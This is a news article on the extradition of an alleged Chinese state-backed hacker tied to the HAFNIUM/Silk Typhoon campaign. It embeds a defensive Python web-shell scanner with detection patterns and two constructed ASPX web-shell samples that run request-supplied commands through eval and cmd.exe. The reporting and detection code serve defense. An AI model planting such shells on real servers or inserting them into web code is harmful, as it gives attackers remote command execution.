Threats

Chinese Silk Typhoon Hacker Extradited to the U.S. from Italy

Marcus Rodriguez
April 28, 2026, 3 min read

A Chinese national, implicated in one of the most damaging state-sponsored hacking campaigns in recent history, has been extradited from Italy to the United States.

Xu Zewei, 34, a citizen of the People’s Republic of China, landed on U.S. soil this past weekend and appeared before U.S. District Court in Houston, Texas, on April 27, 2026.

He is facing a nine-count federal indictment covering a campaign of computer intrusions carried out between February 2020 and June 2021, a period that overlapped with the height of the COVID-19 pandemic and the rise of the widely known HAFNIUM hacking operation.

Xu’s alleged activities reach far beyond ordinary cybercrime. Court documents reveal that officers from China’s Ministry of State Security (MSS), specifically its Shanghai State Security Bureau (SSSB), directed Xu to carry out the intrusions.

At the time, Xu was employed by Shanghai Powerock Network Co. Ltd. (Powerock), a private Chinese technology firm that prosecutors describe as one of many “enabling” companies the Chinese government used to conceal its direct role in cyber operations.

This arrangement, where Beijing outsources espionage to contracted private businesses, has become a known pattern in Chinese state-sponsored cyber activity.

The U.S. Department of Justice (DOJ) states that Xu’s alleged intrusions formed a core part of the HAFNIUM campaign, which the cybersecurity industry now tracks under the name Silk Typhoon.

HAFNIUM is blamed for compromising more than 12,700 U.S. organizations, across sectors ranging from academic institutions to legal services and government-adjacent entities.

FBI Cyber Division Assistant Director Brett Leatherman stated that the extradition shows the FBI’s reach extends well beyond U.S. borders, warning that others who conduct similar operations on behalf of China face the same risk of prosecution.

Starting in early 2020, Xu and his co-conspirators targeted U.S.-based universities, virologists, and immunologists conducting research into COVID-19 vaccines, treatments, and testing methods.

On or about February 19, 2020, Xu confirmed to an SSSB officer that he had successfully breached the network of a research university in the Southern District of Texas.

Days later, that officer directed Xu to access specific email accounts belonging to scientists engaged in COVID-19 research.

Xu later confirmed he extracted the full contents of those researchers’ mailboxes and reported his success back to his SSSB handlers.

His co-defendant, Zhang Yu, 44, also a PRC national, remains at large. Anyone with information on Zhang’s location is urged to contact the FBI at 1-800-CALL-FBI (1-800-225-5324).

The FBI’s Houston Field Office is leading the investigation, and the case is being prosecuted by Assistant U.S. Attorney Mark McIntyre and Deputy Chief Matthew Anzaldi of the National Security Division’s National Security Cyber Section.

Web Shell Deployment as a Persistence Tool

Beginning in late 2020, Xu and his co-conspirators shifted their focus to exploiting vulnerabilities in on-premises Microsoft Exchange Server, a widely deployed enterprise email platform.

After gaining initial access, the group installed web shells on the compromised servers to maintain persistent remote access.

A web shell is a malicious server-side script, dropped into a directory the web server executes, that lets an attacker run commands on the server by sending ordinary HTTP requests to it. Once the shell is in place the attacker can come back at will without re-exploiting the original vulnerability, which is why patching Exchange alone did not evict HAFNIUM from servers that were already compromised: the shell had to be found and removed as well.

The web shells used by Xu and his associates were specifically linked to HAFNIUM actors at that time, which allowed investigators to establish forensic attribution.
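As an added example, not code from the article, the court filings, or the HAFNIUM actors, the following Python script shows the kind of hunt a defender runs for the persistence described above: it walks an IIS web root, scores server-side pages against a few indicators of request-driven code execution, and builds its own throwaway directory of constructed sample pages so it runs offline. The indicator patterns, the file names, and the owa/auth directory layout are assumptions made for the demo, and the two "shell" strings are shape-alikes written for this example, not the shells used in the campaign.

```python
import os
import re
import tempfile
from dataclasses import dataclass

# Indicators typical of ASPX web shells: request-supplied data routed into
# code evaluation or process creation. These patterns were written for this
# example and are not a vendor signature set; tune them before production use.
SHELL_INDICATORS = {
    "server_side_script": re.compile(r"<script[^>]*runat\s*=\s*[\"']?server", re.I),
    "request_into_eval": re.compile(r"eval\s*\(.*Request", re.I),
    "process_creation": re.compile(r"Process\.Start|ProcessStartInfo", re.I),
    "shell_binary": re.compile(r"cmd\.exe|powershell", re.I),
    "request_parameter": re.compile(r"Request(\.Form|\.QueryString|\.Item)?\s*\[", re.I),
}

# Server-side file types IIS will execute; a dropped shell almost always uses one.
WEB_EXTENSIONS = (".aspx", ".ashx", ".asmx", ".asax")


@dataclass
class Finding:
    path: str
    indicators: tuple
    size: int


def score_content(text):
    """Return the names of every indicator present in a file body."""
    return tuple(name for name, rx in SHELL_INDICATORS.items() if rx.search(text))


def scan_webroot(root, min_indicators=2):
    """Walk a web root and flag server-side pages with enough indicators.

    Requiring two independent indicators keeps ordinary pages that merely
    read Request[] from being reported on their own.
    """
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = score_content(fh.read())
            if len(hits) >= min_indicators:
                findings.append(Finding(path, hits, os.path.getsize(path)))
    return findings


def flagged_names(root):
    """Basenames of flagged files, sorted, for a quick summary."""
    return sorted(os.path.basename(f.path) for f in scan_webroot(root))


# --- constructed sample pages (not real HAFNIUM artifacts) -------------------

BENIGN_PAGE = """<%@ Page Language="C#" AutoEventWireup="true" %>
<html><body>
  <asp:Label ID="Status" runat="server" Text="Service available" />
</body></html>
"""

# Shape of a one-line JScript shell: evaluates whatever arrives in a parameter.
EVAL_SHELL = """<script language="JScript" runat="server">
function Page_Load() { eval(Request["cmd"], "unsafe"); }
</script>
"""

# Shape of a C# shell: hands a request value to cmd.exe and echoes the output.
PROCESS_SHELL = """<%@ Page Language="C#" %>
<% var psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + Request.Form["c"]);
   psi.RedirectStandardOutput = true; psi.UseShellExecute = false;
   Response.Write(System.Diagnostics.Process.Start(psi).StandardOutput.ReadToEnd()); %>
"""


def build_sample_webroot():
    """Create a throwaway directory tree with one benign page and two shells."""
    root = tempfile.mkdtemp(prefix="webroot-")
    auth = os.path.join(root, "owa", "auth")  # hypothetical layout for the demo
    os.makedirs(auth)
    for name, body in (("logon.aspx", BENIGN_PAGE),
                       ("helpdesk.aspx", EVAL_SHELL),
                       ("errorpage.aspx", PROCESS_SHELL)):
        with open(os.path.join(auth, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for finding in scan_webroot(build_sample_webroot()):
        print(f"{finding.path}: {', '.join(finding.indicators)} ({finding.size} bytes)")
```

Run it as a script to see the flagged paths. In a real investigation, pair the content score with file creation times (anything written to an Exchange-served directory after the server was exposed and before it was patched deserves a look) and with IIS access logs showing POST requests to the flagged page, because a shell that matches none of these patterns still shows up as an unexpected, recently written executable page that clients are talking to.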

Victims in this phase included a second Texas university and a global law firm with offices in Washington, D.C. Inside that law firm’s systems, the group searched mailboxes for keywords such as “Chinese sources,” “MSS,” and “HongKong,” which points to a focused intelligence-collection goal rather than financial gain.

In April 2021, the Justice Department conducted a court-authorized operation to remove hundreds of lingering web shells from vulnerable U.S. systems. Removing a shell closes the attacker’s door; it does not recover what was taken while the door was open, so affected organizations still had to review mailbox access and any other activity from the period the shell was present.

By July 2021, the United States and allied nations formally attributed the full HAFNIUM campaign to China’s MSS.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Marcus Rodriguez

Marcus is a security researcher and investigative journalist with expertise in vulnerability research, bug bounties, and cloud security. Since 2017, Marcus has been breaking stories on critical vulnerabilities affecting major platforms. His investigative work has led to the disclosure of numerous security flaws and improved defenses across the industry. Marcus is an active participant in bug bounty programs and has been recognized for responsible disclosure practices. He holds multiple security certifications and regularly speaks at industry events.
